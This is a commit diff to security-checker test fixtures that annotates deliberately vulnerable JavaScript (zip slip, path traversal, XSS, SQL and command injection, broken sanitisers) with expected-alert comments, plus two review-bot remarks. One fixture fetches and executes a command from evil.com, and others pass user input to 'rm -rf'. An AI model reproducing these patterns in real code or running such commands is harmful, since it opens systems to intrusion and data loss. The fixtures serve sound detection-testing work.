JS: Accept trivial test changes
This adds Alert annotations for alerts that seem intentional in the test but had not been annotated with 'NOT OK', or where the comment was in the wrong place. In a few cases I included 'Source' expectations to make it easier to see what happened. Other 'Source' expectations will be added in bulk in a later commit.
@@ -1,3 +1,3 @@
|
||||
function endsWith(x, y) {
|
||||
return x.lastIndexOf(y) === x.length - y.length;
|
||||
return x.lastIndexOf(y) === x.length - y.length; // $ Alert
|
||||
}
|
||||
|
||||
@@ -79,23 +79,23 @@
|
||||
/*
|
||||
* NOT OK: flagged
|
||||
*/
|
||||
/(\.xxx)|(\.yyy)|(\.zzz)$/;
|
||||
/(\.xxx)|(\.yyy)|(\.zzz)$/; // $ Alert
|
||||
/(^left|right|center)\sbottom$/; // not flagged at the moment due to interior anchors
|
||||
/\.xxx|\.yyy|\.zzz$/ig;
|
||||
/\.xxx|\.yyy|zzz$/;
|
||||
/\.xxx|\.yyy|\.zzz$/ig; // $ Alert
|
||||
/\.xxx|\.yyy|zzz$/; // $ Alert
|
||||
/^([A-Z]|xxx[XY]$)/; // not flagged at the moment due to interior anchors
|
||||
/^(xxx yyy zzz)|(xxx yyy)/i;
|
||||
/^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i;
|
||||
/^(xxx:)|(yyy:)|(zzz:)/;
|
||||
/^(xxx?:)|(yyy:zzz\/)/;
|
||||
/^@media|@page/;
|
||||
/^\s*(xxx?|yyy|zzz):|xxx:yyy\//;
|
||||
/^click|mouse|touch/;
|
||||
/^http:\/\/good\.com|http:\/\/better\.com/;
|
||||
/^https?:\/\/good\.com|https?:\/\/better\.com/;
|
||||
/^mouse|touch|click|contextmenu|drop|dragover|dragend/;
|
||||
/^xxx:|yyy:/i;
|
||||
/_xxx|_yyy|_zzz$/;
|
||||
/^(xxx yyy zzz)|(xxx yyy)/i; // $ Alert
|
||||
/^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; // $ Alert
|
||||
/^(xxx:)|(yyy:)|(zzz:)/; // $ Alert
|
||||
/^(xxx?:)|(yyy:zzz\/)/; // $ Alert
|
||||
/^@media|@page/; // $ Alert
|
||||
/^\s*(xxx?|yyy|zzz):|xxx:yyy\//; // $ Alert
|
||||
/^click|mouse|touch/; // $ Alert
|
||||
/^http:\/\/good\.com|http:\/\/better\.com/; // $ Alert
|
||||
/^https?:\/\/good\.com|https?:\/\/better\.com/; // $ Alert
|
||||
/^mouse|touch|click|contextmenu|drop|dragover|dragend/; // $ Alert
|
||||
/^xxx:|yyy:/i; // $ Alert
|
||||
/_xxx|_yyy|_zzz$/; // $ Alert
|
||||
/em|%$/; // not flagged at the moment due to the anchor not being for letters
|
||||
|
||||
/*
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
var urlPatterns = [
|
||||
{regex: /youtu\.be\/([\w\-.]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$1'},
|
||||
{regex: /youtube\.com(.+)v=([^&]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$2'},
|
||||
{regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'},
|
||||
{regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, // $ Alert
|
||||
];
|
||||
|
||||
// check optional successsor to TLD
|
||||
|
||||
@@ -2,19 +2,19 @@ let externalLib = require('external-lib');
|
||||
|
||||
let untrusted = window.name;
|
||||
|
||||
externalLib(untrusted);
|
||||
externalLib({x: untrusted});
|
||||
externalLib(...untrusted);
|
||||
externalLib(...window.CONFIG, untrusted);
|
||||
externalLib({ ...untrusted });
|
||||
externalLib(['x', untrusted, 'y']);
|
||||
externalLib('foo', untrusted);
|
||||
externalLib(untrusted); // $ Alert
|
||||
externalLib({x: untrusted}); // $ Alert
|
||||
externalLib(...untrusted); // $ Alert
|
||||
externalLib(...window.CONFIG, untrusted); // $ Alert
|
||||
externalLib({ ...untrusted }); // $ Alert
|
||||
externalLib(['x', untrusted, 'y']); // $ Alert
|
||||
externalLib('foo', untrusted); // $ Alert
|
||||
externalLib({
|
||||
x: {
|
||||
y: {
|
||||
z: untrusted
|
||||
}
|
||||
}
|
||||
} // $ Alert
|
||||
});
|
||||
|
||||
function getDeepUntrusted() {
|
||||
@@ -30,16 +30,16 @@ function getDeepUntrusted() {
|
||||
externalLib(getDeepUntrusted());
|
||||
|
||||
externalLib.get('/foo', (req, res) => {
|
||||
res.send(untrusted);
|
||||
req.app.locals.something.foo(untrusted);
|
||||
res.send(untrusted); // $ Alert
|
||||
req.app.locals.something.foo(untrusted); // $ Alert
|
||||
});
|
||||
|
||||
let jsonSafeParse = require('json-safe-parse');
|
||||
jsonSafeParse(untrusted); // no need to report; has known taint step
|
||||
|
||||
let merge = require('lodash.merge');
|
||||
merge({}, {
|
||||
merge({}, { // $ Alert
|
||||
x: untrusted, // should not be treated as individual named parameters
|
||||
y: untrusted,
|
||||
z: untrusted
|
||||
});
|
||||
}); // $ Alert
|
||||
|
||||
@@ -13,8 +13,8 @@ RegExp(" ");
|
||||
RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z");
|
||||
RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z");
|
||||
RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\=");
|
||||
RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+");
|
||||
RegExp("\[\]\'\\,\.\/");
|
||||
RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert
|
||||
RegExp("\[\]\'\\,\.\/"); // $ Alert
|
||||
RegExp("\{\}\\\"\|\<\>\?");
|
||||
RegExp("\ ");
|
||||
/\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/;
|
||||
@@ -38,7 +38,7 @@ RegExp("\\\\\\\\\a");
|
||||
RegExp("\\\\\\\\\\a");
|
||||
|
||||
// string vs regexp
|
||||
RegExp("\.")
|
||||
RegExp("\.") // $ Alert
|
||||
"\.";
|
||||
|
||||
// other
|
||||
@@ -53,8 +53,8 @@ RegExp("^\\\\Q\\\\E$");
|
||||
RegExp("/\\*");
|
||||
RegExp("/\
|
||||
");
|
||||
RegExp("[\.]");
|
||||
RegExp("a[b\.c]d");
|
||||
RegExp("[\.]"); // $ Alert
|
||||
RegExp("a[b\.c]d"); // $ Alert
|
||||
RegExp("\b");
|
||||
RegExp(`\b`);
|
||||
RegExp(`\k\\k\d\\d`)
|
||||
|
||||
@@ -61,7 +61,7 @@ var server = http.createServer(function(req, res) {
|
||||
var express = require('express');
|
||||
var application = express();
|
||||
|
||||
var views_local = (req, res) => res.render(req.params[0]);
|
||||
var views_local = (req, res) => res.render(req.params[0]); // $ Alert
|
||||
application.get('/views/*', views_local);
|
||||
|
||||
var views_imported = require("./views");
|
||||
@@ -72,10 +72,10 @@ var server = http.createServer(function(req, res) {
|
||||
var server = http.createServer(function(req, res) {
|
||||
let path = url.parse(req.url, true).query.path;
|
||||
|
||||
res.write(fs.readFileSync(fs.realpathSync(path)));
|
||||
res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert
|
||||
fs.realpath(path,
|
||||
function(err, realpath){
|
||||
res.write(fs.readFileSync(realpath));
|
||||
res.write(fs.readFileSync(realpath)); // $ Alert
|
||||
}
|
||||
);
|
||||
|
||||
|
||||
@@ -5,5 +5,5 @@ let app = express();
|
||||
app.use(fileUpload());
|
||||
|
||||
app.get("/some/path", function (req, res) {
|
||||
req.files.foo.mv(req.query.bar);
|
||||
req.files.foo.mv(req.query.bar); // $ Alert
|
||||
});
|
||||
|
||||
@@ -8,11 +8,11 @@ const data = {};
|
||||
|
||||
function init() {
|
||||
hb.registerHelper("catFile", function catFile(filePath) {
|
||||
return fs.readFileSync(filePath); // SINK (reads file)
|
||||
return fs.readFileSync(filePath); // $ Alert
|
||||
});
|
||||
hb.registerHelper("prependToLines", function prependToLines(prefix, filePath) {
|
||||
return fs
|
||||
.readFileSync(filePath)
|
||||
.readFileSync(filePath) // $ Alert
|
||||
.split("\n")
|
||||
.map((line) => prefix + line)
|
||||
.join("\n");
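Review bot: Replacing `// SINK (reads file)` with a bare `// $ Alert` on the `return fs.readFileSync(filePath);` line of the catFile helper drops the only explanation of why that line is the sink, even though the expectation syntax used elsewhere in this commit allows trailing text after the tag. Keep both, e.g. `return fs.readFileSync(filePath); // $ Alert - sink (reads file)`, and the `.readFileSync(filePath) // $ Alert` line in prependToLines could carry the same wording. The enclosing init function continues past the end of the hunk.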
|
||||
@@ -26,7 +26,7 @@ function init() {
|
||||
init();
|
||||
|
||||
app.get('/some/path1', function (req, res) {
|
||||
res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile
|
||||
res.send(data.compiledFileAccess({ path: req.params.path })); // $ Source - template uses vulnerable catFile
|
||||
});
|
||||
|
||||
app.get('/some/path2', function (req, res) {
|
||||
@@ -40,7 +40,7 @@ app.get('/some/path3', function (req, res) {
|
||||
app.get('/some/path4', function (req, res) {
|
||||
res.send(data.compiledMixed({
|
||||
prefix: ">>> ",
|
||||
path: req.params.path // $ Alert - template uses vulnerable helper
|
||||
path: req.params.path // $ Source - template uses vulnerable helper
|
||||
}));
|
||||
});
|
||||
|
||||
|
||||
@@ -6,11 +6,11 @@ const parseTorrent = require('parse-torrent');
|
||||
|
||||
const browser = await puppeteer.launch();
|
||||
const page = await browser.newPage();
|
||||
await page.pdf({ path: tainted, format: 'a4' });
|
||||
await page.pdf({ path: tainted, format: 'a4' }); // $ Alert
|
||||
|
||||
const pages = await browser.pages();
|
||||
for (let i = 0; i < something(); i++) {
|
||||
pages[i].screenshot({ path: tainted });
|
||||
pages[i].screenshot({ path: tainted }); // $ Alert
|
||||
}
|
||||
|
||||
await browser.close();
|
||||
|
||||
@@ -1 +1 @@
|
||||
module.exports = (req, res) => res.render(req.params[0]);
|
||||
module.exports = (req, res) => res.render(req.params[0]); // $ Alert
|
||||
|
||||
@@ -3,5 +3,5 @@ var AdmZip = require('adm-zip');
|
||||
var zip = new AdmZip("archive.zip");
|
||||
var zipEntries = zip.getEntries();
|
||||
zipEntries.forEach(function(zipEntry) {
|
||||
fs.createWriteStream(zipEntry.entryName);
|
||||
fs.createWriteStream(zipEntry.entryName); // $ Alert
|
||||
});
|
||||
|
||||
@@ -3,10 +3,10 @@ const tar = require('tar-stream');
|
||||
const extract = tar.extract();
|
||||
|
||||
extract.on('entry', (header, stream, next) => {
|
||||
const out = fs.createWriteStream(header.name);
|
||||
const out = fs.createWriteStream(header.name); // $ Alert
|
||||
|
||||
if (header.linkname) {
|
||||
fs.linkSync(header.linkname, "foo");
|
||||
fs.linkSync(header.linkname, "foo"); // $ Alert
|
||||
}
|
||||
|
||||
stream.pipe(out);
|
||||
|
||||
@@ -4,7 +4,7 @@ const unzip = require('unzip');
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
entry.pipe(fs.createWriteStream(fileName));
|
||||
});
|
||||
|
||||
@@ -12,14 +12,14 @@ var Writer = require('fstream').Writer;
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
entry.pipe(Writer({path: fileName}));
|
||||
});
|
||||
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
var file = fs.openSync(fileName, "w");
|
||||
});
|
||||
|
||||
@@ -27,11 +27,11 @@ const JSZip = require('jszip');
|
||||
const zip = new JSZip();
|
||||
const path = require('path');
|
||||
function doZipSlip() {
|
||||
for (const name in zip.files) {
|
||||
for (const name in zip.files) { // $ Alert
|
||||
fs.createWriteStream(name);
|
||||
}
|
||||
|
||||
zip.forEach((name, file) => {
|
||||
zip.forEach((name, file) => { // $ Alert
|
||||
fs.createWriteStream(name);
|
||||
});
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@ var fs = require('fs');
|
||||
var unzip = require('unzip');
|
||||
fs.readFile('path/to/archive.zip', function (err, zipContents) {
|
||||
unzip.Parse(zipContents).on('entry', function (entry) {
|
||||
var fileName = 'output/path/' + entry.path;
|
||||
var fileName = 'output/path/' + entry.path; // $ Alert
|
||||
fs.writeFileSync(fileName, entry.contents);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -4,6 +4,6 @@ const unzipper = require('unzipper');
|
||||
fs.createReadStream('path/to/archive.zip')
|
||||
.pipe(unzipper.Parse())
|
||||
.on('entry', function (entry) {
|
||||
var fileName = entry.path;
|
||||
var fileName = entry.path; // $ Alert
|
||||
entry.pipe(fs.createWriteStream(fileName));
|
||||
});
|
||||
|
||||
@@ -3,6 +3,6 @@ let https = require("https"),
|
||||
|
||||
https.get("https://evil.com/getCommand", res =>
|
||||
res.on("data", command => {
|
||||
cp.execSync(command);
|
||||
cp.execSync(command); // $ Alert
|
||||
})
|
||||
);
|
||||
|
||||
@@ -158,7 +158,7 @@ module.exports.indirect2 = function (name) {
|
||||
let args = ["-c", cmd];
|
||||
cp.spawn(sh, args, cb);
|
||||
|
||||
let cmd2 = "rm -rf " + name;
|
||||
let cmd2 = "rm -rf " + name; // $ Alert
|
||||
var args2 = [cmd2];
|
||||
cp.spawn(
|
||||
'cmd.exe',
|
||||
@@ -178,7 +178,7 @@ module.exports.sanitizer = function (name) {
|
||||
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
|
||||
cp.exec("rm -rf " + sanitized);
|
||||
|
||||
var broken = "'" + name.replace(/'/g, "'\''") + "'"
|
||||
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert
|
||||
cp.exec("rm -rf " + broken); // $ Alert
|
||||
}
|
||||
|
||||
@@ -551,8 +551,8 @@ module.exports.shellThing = function (name) {
|
||||
function indirectShell(cmd, args, spawnOpts) {
|
||||
cp.spawn(cmd, args, spawnOpts); // $ Alert
|
||||
}
|
||||
|
||||
indirectShell("rm", ["-rf", name], {shell: true});
|
||||
|
||||
indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert
|
||||
}
|
||||
|
||||
module.exports.badSanitizer = function (name) {
|
||||
@@ -630,7 +630,7 @@ module.exports.veryIndeirect = function (name) {
|
||||
}
|
||||
|
||||
module.exports.sanitizer = function (name) {
|
||||
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'"
|
||||
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert
|
||||
cp.exec("rm -rf " + sanitized); // $ Alert
|
||||
|
||||
var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'"
|
||||
|
||||
@@ -70,7 +70,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
|
||||
if (e.clipboardData.types.includes('text/html')) {
|
||||
const droppedHtml = e.clipboardData.getData('text/html');
|
||||
const container = document.createElement('html');
|
||||
container.innerHTML = droppedHtml;
|
||||
container.innerHTML = droppedHtml; // $ Alert
|
||||
const imgs = container.getElementsByTagName('img');
|
||||
if (imgs.length === 1) {
|
||||
const src = imgs[0].src;
|
||||
|
||||
@@ -70,7 +70,7 @@ async function getDropData(e: DragEvent): Promise<Array<File | string>> {
|
||||
if (e.dataTransfer.types.includes('text/html')) {
|
||||
const droppedHtml = e.dataTransfer.getData('text/html');
|
||||
const container = document.createElement('html');
|
||||
container.innerHTML = droppedHtml;
|
||||
container.innerHTML = droppedHtml; // $ Alert
|
||||
const imgs = container.getElementsByTagName('img');
|
||||
if (imgs.length === 1) {
|
||||
const src = imgs[0].src;
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
export function createHtml(x) {
|
||||
return x;
|
||||
return x; // $ Alert
|
||||
}
|
||||
|
||||
@@ -232,7 +232,7 @@ function react(){
|
||||
}
|
||||
|
||||
render() {
|
||||
return <span dangerouslySetInnerHTML={{__html: this.state.stateTainted}}/>;
|
||||
return <span dangerouslySetInnerHTML={{__html: this.state.stateTainted}}/>; // $ Alert
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
function test(elt) {
|
||||
var tainted = document.location.search.substring(1);
|
||||
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted);
|
||||
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted);
|
||||
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert
|
||||
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert
|
||||
}
|
||||
|
||||
@@ -118,7 +118,7 @@ app.get("invalid/keys/:id", async (req, res) => {
|
||||
const invalidKeys = keyArray.filter(key => !whitelist.includes(key));
|
||||
|
||||
if (invalidKeys.length) {
|
||||
res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`);
|
||||
res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); // $ Alert
|
||||
return;
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
@@ -8,5 +8,5 @@ app.get("/some/path", (req, res) => {
|
||||
if(req.query.jsonp && isVarName(req.query.jsonp))
|
||||
response = req.query.jsonp + "(" + response + ")";
|
||||
|
||||
res.send(response);
|
||||
res.send(response); // $ Alert
|
||||
});
|
||||
|
||||
@@ -5,14 +5,14 @@ export default function Post() {
|
||||
Post.getInitialProps = async (ctx) => {
|
||||
const req = ctx.req;
|
||||
const res = ctx.res;
|
||||
res.end(req.url);
|
||||
res.end(req.url); // $ Alert
|
||||
return {}
|
||||
}
|
||||
|
||||
export async function getServerSideProps(ctx) {
|
||||
const req = ctx.req;
|
||||
const res = ctx.res;
|
||||
res.end(req.url);
|
||||
res.end(req.url); // $ Alert
|
||||
return {
|
||||
props: {}
|
||||
}
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
export default function handler(req, res) {
|
||||
res.send(req.url);
|
||||
res.send(req.url); // $ Alert
|
||||
}
|
||||
@@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => {
|
||||
conditions.push(`version = ${version}`)
|
||||
}
|
||||
|
||||
new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null);
|
||||
new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // $ Alert
|
||||
});
|
||||
|
||||
function validVersion(version) {
|
||||
|
||||
@@ -8,6 +8,6 @@ var db = new sqlite3.Database(':memory:');
|
||||
var io = require('socket.io')();
|
||||
io.on('connection', (socket) => {
|
||||
socket.on('newuser', (handle) => {
|
||||
db.run(`INSERT INTO users(name) VALUES ${handle}`);
|
||||
db.run(`INSERT INTO users(name) VALUES ${handle}`); // $ Alert
|
||||
});
|
||||
});
|
||||
|
||||
@@ -7,5 +7,5 @@ var db = new sqlite3.Database(':memory:');
|
||||
|
||||
var app = express();
|
||||
app.get('/post/:id', function(req, res) {
|
||||
db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"');
|
||||
db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); // $ Alert
|
||||
});
|
||||
|
||||
@@ -5,5 +5,5 @@ var db = new sqlite3.Database(':memory:');
|
||||
|
||||
angular.module('myApp', ['ngRoute'])
|
||||
.controller('FindPost', function($routeParams) {
|
||||
db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"');
|
||||
db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); // $ Alert
|
||||
});
|
||||
|
||||
@@ -19,7 +19,7 @@ const matter = require("gray-matter");
|
||||
export function greySink(data) {
|
||||
const str = `
|
||||
---js
|
||||
${data}
|
||||
${data /* $ Alert[js/unsafe-code-construction] */}
|
||||
---
|
||||
`
|
||||
const res = matter(str);
|
||||
|
||||
@@ -7,7 +7,7 @@ class Application extends React.Component {
|
||||
<div className="application">
|
||||
<Helmet>
|
||||
<title>My unsafe</title>
|
||||
<script type="application/javascript">{document.location.hash}</script>
|
||||
<script type="application/javascript">{document.location.hash}</script> {/* $ Alert[js/code-injection] */}
|
||||
</Helmet>
|
||||
</div>
|
||||
);
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
function badEncode(s) {
|
||||
return s.replace(/"/g, """)
|
||||
.replace(/'/g, "'")
|
||||
.replace(/&/g, "&");
|
||||
.replace(/&/g, "&"); // $ Alert
|
||||
}
|
||||
|
||||
function goodEncode(s) {
|
||||
@@ -17,7 +17,7 @@ function goodDecode(s) {
|
||||
}
|
||||
|
||||
function badDecode(s) {
|
||||
return s.replace(/&/g, "&")
|
||||
return s.replace(/&/g, "&") // $ Alert
|
||||
.replace(/"/g, "\"")
|
||||
.replace(/'/g, "'");
|
||||
}
|
||||
@@ -27,7 +27,7 @@ function cleverEncode(code) {
|
||||
}
|
||||
|
||||
function badDecode2(s) {
|
||||
return s.replace(/&/g, "&")
|
||||
return s.replace(/&/g, "&") // $ Alert
|
||||
.replace(/s?ome|thin*g/g, "else")
|
||||
.replace(/'/g, "'");
|
||||
}
|
||||
@@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) {
|
||||
}
|
||||
|
||||
function badDecode3(s) {
|
||||
s = s.replace(/&/g, "&");
|
||||
s = s.replace(/&/g, "&"); // $ Alert
|
||||
s = s.replace(/"/g, "\"");
|
||||
return s.replace(/'/g, "'");
|
||||
}
|
||||
|
||||
function badUnescape(s) {
|
||||
return s.replace(/\\\\/g, '\\')
|
||||
return s.replace(/\\\\/g, '\\') // $ Alert
|
||||
.replace(/\\'/g, '\'')
|
||||
.replace(/\\"/g, '\"');
|
||||
}
|
||||
|
||||
function badPercentEscape(s) {
|
||||
s = s.replace(/&/g, '%26');
|
||||
s = s.replace(/%/g, '%25');
|
||||
s = s.replace(/%/g, '%25'); // $ Alert
|
||||
return s;
|
||||
}
|
||||
|
||||
@@ -67,7 +67,7 @@ function badEncode(s) {
|
||||
var indirect3 = /&/g;
|
||||
return s.replace(indirect1, """)
|
||||
.replace(indirect2, "'")
|
||||
.replace(indirect3, "&");
|
||||
.replace(indirect3, "&"); // $ Alert
|
||||
}
|
||||
|
||||
function badEncodeWithReplacer(s) {
|
||||
@@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) {
|
||||
"'": "'",
|
||||
"&": "&"
|
||||
};
|
||||
return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&");
|
||||
return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert
|
||||
}
|
||||
|
||||
// dubious, but out of scope for this query
|
||||
|
||||
@@ -2,71 +2,71 @@ let express = require('express');
|
||||
var app = express();
|
||||
|
||||
function bad1(s) {
|
||||
return s.replace("'", ""); // $ Alert
|
||||
return s.replace("'", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad2(s) {
|
||||
return s.replace(/'/, ""); // $ Alert
|
||||
return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad3(s) {
|
||||
return s.replace(/'/g, "\\'"); // $ Alert
|
||||
return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4(s) {
|
||||
return s.replace(/'/g, "\\$&"); // $ Alert
|
||||
return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad5(s) {
|
||||
return s.replace(/['"]/g, "\\$&"); // $ Alert
|
||||
return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad6(s) {
|
||||
return s.replace(/(['"])/g, "\\$1"); // $ Alert
|
||||
return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad7(s) {
|
||||
return s.replace(/('|")/g, "\\$1"); // $ Alert
|
||||
return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad8(s) {
|
||||
return s.replace('|', ''); // $ Alert
|
||||
return s.replace('|', ''); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad9(s) {
|
||||
return s.replace(/"/g, "\\\""); // $ Alert
|
||||
return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad10(s) {
|
||||
return s.replace("/", "%2F"); // $ Alert
|
||||
return s.replace("/", "%2F"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad11(s) {
|
||||
return s.replace("%25", "%"); // $ Alert
|
||||
return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad12(s) {
|
||||
return s.replace(`'`, ""); // $ Alert
|
||||
return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad13(s) {
|
||||
return s.replace("'", ``); // $ Alert
|
||||
return s.replace("'", ``); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad14(s) {
|
||||
return s.replace(`'`, ``); // $ Alert
|
||||
return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad15(s) {
|
||||
return s.replace("'" + "", ""); // $ Alert
|
||||
return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad16(s) {
|
||||
return s.replace("'", "" + ""); // $ Alert
|
||||
return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad17(s) {
|
||||
return s.replace("'" + "", "" + ""); // $ Alert
|
||||
return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function good1(s) {
|
||||
@@ -130,23 +130,23 @@ function good12(s) {
|
||||
s.replace('[', '').replace(']', '');
|
||||
s.replace('(', '').replace(')', '');
|
||||
s.replace('{', '').replace('}', '');
|
||||
s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer
|
||||
s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer
|
||||
|
||||
s.replace('[', '\\[').replace(']', '\\]'); // $ Alert
|
||||
s.replace('{', '\\{').replace('}', '\\}'); // $ Alert
|
||||
s.replace('[', '\\[').replace(']', '\\]');
|
||||
s.replace('{', '\\{').replace('}', '\\}');
|
||||
|
||||
s = s.replace('[', '');
|
||||
s = s.replace(']', '');
|
||||
s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended
|
||||
s.replace(']', '').replace('[', ''); // probably OK, but still flagged
|
||||
s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended
|
||||
s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged
|
||||
}
|
||||
|
||||
function newlines(s) {
|
||||
// motivation for whitelist
|
||||
require("child_process").execSync("which emacs").toString().replace("\n", "");
|
||||
|
||||
x.replace("\n", "").replace(x, y); // $ Alert
|
||||
x.replace(x, y).replace("\n", ""); // $ Alert
|
||||
x.replace("\n", "").replace(x, y);
|
||||
x.replace(x, y).replace("\n", "");
|
||||
}
|
||||
|
||||
app.get('/some/path', function(req, res) {
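Review bot: The new side drops the `$ Alert` from `s.replace('<', '').replace('>', '');` and from `s.replace(/{/, '').replace(/}/, '');` but keeps their trailing rationale ('too common as a bad HTML sanitizer', 'should have used a string literal …'), which was written to justify an alert and now reads as if the line were still flagged. If the query intentionally does not report these, say so on the line, e.g. `s.replace('<', '').replace('>', ''); // not flagged - too common as a bad HTML sanitizer`; if the drop merely accepts a result that went missing, the expectation should stay and the query output be checked instead. The same pattern recurs in the hunks headed `@@ -199,20 +199,20 @@` and `@@ -330,27 +330,27 @@`, where the bodies of typicalBadHtmlSanitizers and bad18NewRegExp lose every expectation while their names still say 'bad'. The function containing the first lines of this hunk (good12, per the hunk header) starts outside it.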
|
||||
@@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) {
|
||||
|
||||
(function (s) {
|
||||
var indirect = /'/;
|
||||
return s.replace(indirect, ""); // $ Alert
|
||||
return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization]
|
||||
});
|
||||
|
||||
(function (s) {
|
||||
@@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) {
|
||||
});
|
||||
|
||||
function bad18(p) {
|
||||
return p.replace("/../", ""); // $ Alert
|
||||
return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(/[<>]/g,''); // $ Alert
|
||||
s().replace(/[<>&]/g, ''); // $ Alert
|
||||
s().replace(/[<>"]/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/>/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/>/g, '').replace(/&/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/&/g, '').replace(/>/g, ''); // $ Alert
|
||||
s().replace(/&/g, '').replace(/>/g, '').replace(/</g, ''); // $ Alert
|
||||
s().replace(/[<>]/g,'');
|
||||
s().replace(/[<>&]/g, '');
|
||||
s().replace(/[<>"]/g, '');
|
||||
s().replace(/</g, '').replace(/>/g, '');
|
||||
s().replace(/</g, '').replace(/>/g, '').replace(/&/g, '');
|
||||
